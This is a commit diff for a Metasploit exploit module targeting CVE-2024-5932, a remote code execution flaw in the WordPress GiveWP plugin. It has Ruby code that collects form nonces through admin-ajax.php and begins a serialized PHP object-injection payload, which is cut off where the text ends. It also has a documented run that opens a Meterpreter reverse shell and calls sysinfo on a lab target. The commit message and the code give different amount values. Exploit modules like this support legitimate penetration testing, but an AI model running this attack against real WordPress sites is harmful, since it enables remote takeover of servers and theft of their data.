Refactored exploit module based on RCESecurity's analysis of CVE-2024-5932

- Completely overhauled the method for exploiting the GiveWP plugin by removing dependency on the REST API, which may require authentication.
- Instead, we now use the admin-ajax.php endpoint for retrieving form lists and nonce values, ensuring compatibility even when REST API authentication is required.
- The exploit now works with all form types; however, the give_price_id and give_amount must be set to '0' and '0.00', respectively, as attempts to randomize these values caused the exploit to fail.

Author: Chocapikk

documentation/modules/exploit/multi/http/wp_givewp_rce.md

@@ -48,7 +48,7 @@ docker cp give docker-wordpress-1:/var/www/html/wp-content/plugins
 
 3. **Create a Donation Form**:
   - Navigate to the "Forms" section within the GiveWP plugin and click on "Add Form."
-  - Select the Legacy Form option, as this is the one confirmed to work with the exploit.
+  - Select the any form.
   - Configure the form as needed, publish it.
 
 ## Options
@@ -70,23 +70,19 @@ No specific options need to be configured.
 Using `cmd/linux/http/x64/meterpreter/reverse_tcp`:
 
 ```bash
+msf6 > use exploit/multi/http/wp_givewp_rce 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
 msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:8888
 
 [*] Started reverse TCP handler on 192.168.1.36:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] WordPress Version: 6.3.2
 [+] Detected GiveWP Plugin version: 3.14.1
 [+] The target appears to be vulnerable.
-[+] Successfully connected to the GiveWP API.
-[*] Analyzing Form ID: 13
-[+] Form ID: 13 has required fields.
-[*] Analyzing Form ID: 10
-[-] Form ID: 10 does not contain all required fields.
-[*] Analyzing Form ID: 8
-[-] Form ID: 8 does not contain all required fields.
-[*] Sending exploit payload...
+[+] Successfully retrieved form list. Available Form IDs: 8, 10, 13
+[*] Using Form ID: 13 for exploitation.
 [*] Sending stage (3045380 bytes) to 172.24.0.3
-[*] Meterpreter session 60 opened (192.168.1.36:4444 -> 172.24.0.3:59102) at 2024-08-27 19:24:44 +0200
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.24.0.3:51272) at 2024-08-27 22:11:22 +0200
 
 meterpreter > sysinfo 
 Computer     : 172.24.0.3
@@ -95,7 +91,3 @@ Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
 ```
-
-### Notes:
-- The exploitation is successful only against legacy donation forms within GiveWP.
-Be sure to configure and test legacy forms to verify the vulnerability effectively.

modules/exploits/multi/http/wp_givewp_rce.rb

@@ -71,75 +71,65 @@ def initialize(info = {})
   def check
     return CheckCode::Unknown unless wordpress_and_online?
 
-    wp_version = wordpress_version
-    print_status("WordPress Version: #{wp_version}") if wp_version
-
+    print_status("WordPress Version: #{wordpress_version}") if wordpress_version
     check_code = check_plugin_version_from_readme('give', '3.14.2')
+    return CheckCode::Safe unless check_code.code == 'appears'
 
-    if check_code.code != 'appears'
-      return CheckCode::Safe
-    end
-
-    plugin_version = check_code.details[:version]
-    print_good("Detected GiveWP Plugin version: #{plugin_version}")
+    print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}")
     CheckCode::Appears
   end
 
   def exploit
-    forms = connect_to_api
+    forms = fetch_form_list
+    fail_with(Failure::UnexpectedReply, 'No forms found.') if forms.empty?
 
-    if forms
-      valid_forms = parse_forms(forms)
+    selected_form = forms.sample
+    valid_form = retrieve_and_analyze_form(selected_form['id'])
 
-      send_exploit_requests(valid_forms)
-    else
-      fail_with(Failure::UnexpectedReply, 'Failed to connect to the GiveWP API.')
-    end
-  end
+    return print_error('Failed to retrieve a valid form for exploitation.') unless valid_form
 
-  def connect_to_api
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '?give-api=v1/forms')
+    print_status("Using Form ID: #{valid_form['give_form_id']} for exploitation.")
+    send_exploit_request(
+      valid_form['give_form_id'],
+      valid_form['give_form_hash'],
+      valid_form['give_price_id'],
+      valid_form['give_amount']
     )
-
-    print_good('Successfully connected to the GiveWP API.') if res&.code == 200
-    print_error('Failed to connect to the GiveWP API.') unless res&.code == 200
-
-    JSON.parse(res.body)['forms'] if res&.code == 200
   end
 
-  def parse_forms(forms)
-    forms.each_with_object([]) do |form, valid_forms|
-      form_id = form.dig('info', 'id')
-      print_status("Analyzing Form ID: #{form_id}")
+  def fetch_form_list
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'data' => 'action=give_form_search'
+    )
 
-      form_data = retrieve_and_analyze_form(form_id)
+    return print_error('Failed to retrieve form list.') unless res&.code == 200
 
-      print_good("Form ID: #{form_id} has required fields.") if form_data
-      print_error("Form ID: #{form_id} does not contain all required fields.") unless form_data
+    forms = JSON.parse(res.body)
+    form_ids = forms.map { |form| form['id'] }.sort
 
-      valid_forms << form_data if form_data
-    end
+    print_good("Successfully retrieved form list. Available Form IDs: #{form_ids.join(', ')}")
+    forms
   end
 
   def retrieve_and_analyze_form(form_id)
     form_res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "?post_type=give_forms&p=#{form_id}")
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'vars_post' => { 'action' => 'give_donation_form_nonce', 'give_form_id' => form_id }
     )
 
-    return nil unless form_res&.code == 200
+    return unless form_res&.code == 200
 
-    doc = Nokogiri::HTML(form_res.body)
-    give_form_id = doc.at_xpath('//input[@name="give-form-id"]/@value')&.text
-    give_form_hash = doc.at_xpath('//input[@name="give-form-hash"]/@value')&.text
-    button_tag = doc.at_xpath('//button[@data-price-id]')
+    form_data = JSON.parse(form_res.body)
+    give_form_id = form_id
+    give_form_hash = form_data['data']
+    give_price_id = '0'
+    give_amount = '$10.00'
+    # Somehow, can't randomize give_price_id and give_amount otherwise the exploit won't work.
 
-    return nil unless give_form_id && give_form_hash && button_tag
-
-    give_price_id = button_tag['data-price-id']
-    give_amount = button_tag.text.strip
+    return unless give_form_hash
 
     {
       'give_form_id' => give_form_id,
@@ -149,18 +139,6 @@ def retrieve_and_analyze_form(form_id)
     }
   end
 
-  def send_exploit_requests(valid_forms)
-    print_status('Sending exploit payload...')
-    valid_forms.each do |form_data|
-      send_exploit_request(
-        form_data['give_form_id'],
-        form_data['give_form_hash'],
-        form_data['give_price_id'],
-        form_data['give_amount']
-      )
-    end
-  end
-
   def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount)
     final_payload = format(
       'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \